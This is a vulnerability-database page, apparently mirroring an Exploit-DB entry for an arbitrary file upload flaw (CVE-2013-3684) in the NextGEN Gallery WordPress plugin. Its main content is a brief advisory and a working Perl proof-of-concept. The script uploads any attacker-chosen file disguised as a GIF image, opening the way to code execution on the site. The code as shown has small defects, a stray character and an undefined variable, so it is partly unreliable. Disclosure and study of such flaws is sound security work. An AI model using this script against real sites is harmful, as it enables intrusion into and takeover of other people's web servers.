Lucene search
+L

WordPress Plugin NextGEN Gallery - 'upload.php' Arbitrary File Upload

🗓️ 12 Jun 2013 00:00:00Reported by Marcos GarciaType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 50 Views

NextGEN Gallery WordPress Plugin Arbitrary File Upload vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2013-3684
12 Jun 201300:00
circl
CVE
CVE-2013-3684
11 Feb 202017:48
cve
Cvelist
CVE-2013-3684
11 Feb 202017:48
cvelist
NVD
CVE-2013-3684
11 Feb 202018:15
nvd
Packet Storm
NextGEN Gallery 1.9.12 Shell Upload
13 Jun 201300:00
packetstorm
Patchstack
WordPress NextGEN Gallery - Arbitrary File Upload
12 Jun 201300:00
patchstack
Prion
Design/Logic Flaw
11 Feb 202018:15
prion
RedhatCVE
CVE-2013-3684
22 May 202505:36
redhatcve
WPVulnDB
NextGEN Gallery 1.9.12 - Arbitrary File Upload
1 Aug 201410:58
wpvulndb
source: https://www.securityfocus.com/bid/60533/info

The NextGEN Gallery plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files.

An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in an arbitrary code execution within the context of the vulnerable application.

NextGEN Gallery 1.9.12 is vulnerable; other versions may also be affected.

#! /usr/bin/perl
use LWP;
use HTTP::Request::Common;

my ($url, $file) = @ARGV;

my $ua = LWP::UserAgent->new();
my $req = POST $url,
Content_Type => 'form-data',
Content => [.
name => $name,
galleryselect => 1, # Gallery ID, should exist
Filedata => [ "$file", "file.gif", Content_Type =>
'image/gif' ]
];
my $res = $ua->request( $req );
if( $res->is_success ) {
print $res->content;
} else {
print $res->status_line, "\n";
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

31 Oct 2015 00:00Current
8.4High risk
Vulners AI Score8.4
CVSS 3.19.8
CVSS 210
EPSS0.19231
50